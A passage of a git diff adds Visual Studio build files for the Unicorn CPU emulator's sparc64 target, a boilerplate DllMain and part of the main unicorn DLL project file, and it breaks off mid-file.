-0,0 +1,231 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\sparc64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + 
<ClCompile Include="..\..\..\qemu\hw\sparc64\sun4u.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\cc_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\fop_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\int64_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\ldst_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\mmu_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\unicorn64.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\vis_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\win_helper.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{8804AD29-E398-480C-AC0F-98EC1B7A51CB}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sparc64softmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + 
<ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + 
<AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc64.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc64.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + 
<Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + 
<ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj.filters new file mode 100644 index 0000000..cf669e8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj.filters @@ -0,0 +1,125 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{ee6a3abf-6f14-47ab-8b40-f859d030230a}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{4a271b0a-7736-4457-98f8-8c21ad4d2601}</UniqueIdentifier> + </Filter> + <Filter Include="hw\sparc64"> + <UniqueIdentifier>{46e355ab-da0b-431b-929b-8d77b3ab90bc}</UniqueIdentifier> + </Filter> + <Filter Include="target-sparc"> + <UniqueIdentifier>{1f15e2b2-fae3-41e5-b787-70c44beb828c}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{7c7b0370-fe65-4c21-94e6-f4561470087d}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{51a4ddc6-4078-4db0-9b29-c68c558b2f93}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + 
<Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu-qom.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\helper.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\unicorn.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\sparc64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\target-sparc\cc_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\cpu.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\fop_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\ldst_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\mmu_helper.c"> + 
<Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\translate.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\win_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\vis_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\int64_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\unicorn64.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\hw\sparc64\sun4u.c"> + <Filter>hw\sparc64</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/dllmain.cpp b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/dllmain.cpp new file mode 100644 index 0000000..3d0eb14 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/dllmain.cpp @@ -0,0 +1,18 @@ +#include <windows.h> + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { 
+ case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj new file mode 100644 index 0000000..b8bf19e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj @@ -0,0 +1,374 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>unicorn</RootNamespace> + <ProjectName>unicorn</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + 
<ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;UNICORN_DLL_EXPORTS;UNICORN_SHARED;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__i386__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> 
+ <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;UNICORN_DLL_EXPORTS;UNICORN_SHARED;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__x86_64__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + 
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;UNICORN_DLL_EXPORTS;UNICORN_SHARED;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__i386__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + 